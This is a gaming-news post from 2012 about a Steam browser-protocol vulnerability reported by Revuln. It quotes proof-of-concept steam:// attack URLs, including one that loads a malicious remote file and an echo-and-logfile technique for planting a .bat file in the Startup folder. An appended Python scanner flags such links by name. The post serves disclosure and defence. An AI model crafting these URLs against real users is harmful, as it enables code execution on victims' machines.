Guru3D.com

Steam Security Vulnerability Found when Using Certain Browsers

Posted on: 10/18/2012 06:45 AM | 1 comment(s)

TGN reports that some browsers will execute the steam:// protocol without so much as a single prompt to the user. Chrome, IE, and Firefox will all at least provide prompts to the user, with Chrome providing some more detailed information as to what that URL is attempting to do. The problem can also be found in browsers such as WebKit, MaxThon, Avant, and LunaScape. Keep in mind that Steam's own internal browser utilizes WebKit for its rendering. Other browsers such as Opera, SeaMonkey, PaleMoon, and SRWare Iron do not provide the detailed explanation that Chrome provides to the user but should at least provide some sort of a prompt.

The fact that some browsers will not give enough information is only part of the problem. The big issue here is that the Steam URL can be used to run games with potentially harmful command line parameters. The hardware and security group responsible for discovering this vulnerability, Revuln, went through a variety of tests to show a proof of concept. Keep in mind that this vulnerability is not limited to Valve's own titles.

Example 1 - Unreal Engine
For games based on the Unreal Engine we opted for exploiting a real security vulnerability that occurs while loading content that resides on remote computers (Windows remote WebDAV or SMB share) which we can load via command-line parameters:

steam://run/ID/server \\HOST\evil.upk -silent

Indeed this engine is affected by many integer overflow vulnerabilities (maybe we will document them one of these days) that allow execution of malicious code.

Example 2 - APB Reloaded
In this case we decide an arbitrary update server via command-line and exploit a directory traversal for overwriting or creating any file we desire with our custom content.

On Steam there are tons of MMO games free-to-play like APB so the user base is very big and most of them can be exploited with such techniques. Additionally most of these games use anti-cheating solutions and require to be launched with Administrator permissions (we are in the gaming world where people don’t have security knowledge, having such privileges is quite common) so the whole system can be compromised.

Example 3 - Team Fortress 2
Most of them include the basic commands available in the Source engine, which we are going to use for writing files with custom content in arbitrary locations. For exploiting this engine we have opted for the following command-line options:

+con_logfile, allows you to specify a file that will receive the content of the console (it can’t be a Windows remote share)
+echo, used to put custom data in the log file
+quit, (optional) closes the game
-hijack, (optional) useful in case the user already has an instance of the game running and we want to send additional commands that are limited by the Q_URLDecode 128 chars

Our choice for exploiting this bug is to create a .bat file in the Startup folder of the user account which will execute our commands injected through +echo at the next login of the user on the system. There is also an interesting scenario against dedicated servers by specifying the motd.txt of the game as logfile and launching the cvarlist command that will dump all the game variables in such file that is visible to any player who joins the server.


These are just three basic examples. A more visual proof of concept can be seen in the video below. To protect yourself, do not click on any links you do not trust. Before clicking, hover over the link to see where it really points, even if it looks safe on the surface. Another important precaution is to disable the steam:// URL handler within your browser of choice.
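One way to automate the link check described above, as an added example that is not from the article or from Revuln: it collects steam:// links from a page's markup and flags `run` commands that carry launch arguments, a remote share path, or one of the options listed in Example 3. The sample markup is constructed, and ID, HOST and example.log are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Launch options the article lists for the Source engine example.
PAGE_NAMED_OPTIONS = {"+con_logfile", "+echo", "+quit", "-hijack"}

def classify(url):
    """Return the findings for one steam:// URL (empty list = nothing flagged)."""
    decoded = unquote(url.strip())            # decodes %20 etc.; '+' stays literal
    if not decoded.lower().startswith("steam://"):
        return []
    command, _, rest = decoded[len("steam://"):].partition("/")
    _app_id, _, args = rest.partition("/")
    args = args.strip("/ ")
    findings = []
    if command.lower() == "run" and args:
        # Anything after the game ID is passed on as launch arguments.
        findings.append("extra-launch-arguments")
        if "\\\\" in args:                    # \\HOST\share style path
            findings.append("remote-share-path")
        for token in args.split():
            if token.lower() in PAGE_NAMED_OPTIONS:
                findings.append("option:" + token.lower())
    return findings

class SteamLinkCollector(HTMLParser):
    """Collects href/src attribute values that use the steam:// scheme."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value and value.strip().lower().startswith("steam://"):
                self.links.append(value.strip())

def scan_html(html):
    """Map each steam:// link found in the markup to its findings."""
    collector = SteamLinkCollector()
    collector.feed(html)
    return {link: classify(link) for link in collector.links}

# Constructed sample markup; ID, HOST and example.log are placeholders.
SAMPLE_HTML = r'''
<a href="steam://store/ID">Store page</a>
<a href="steam://run/ID">Play</a>
<a href="steam://run/ID/server \\HOST\evil.upk -silent">Free map pack</a>
<iframe src="steam://run/ID/+con_logfile%20example.log%20+echo%20test%20+quit"></iframe>
<a href="https://example.com/">Unrelated</a>
'''

if __name__ == "__main__":
    for link, findings in scan_html(SAMPLE_HTML).items():
        print("FLAG" if findings else "ok  ", link, findings)
```

Links embedded in `src` attributes matter as much as clickable ones, because a browser that does not prompt will hand them to the handler without any click.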




Texter
Senior Member



Posts: 3175
Joined: 2008-11-03

#4433998 Posted on: 10/18/2012 11:24 PM
Had to BLOCK STEAM with Peerblock today to stop Firefox from popping up while I was exiting Deus Ex: IW. Really annoying. Didn't know WTH was going on until I read the 'news'.
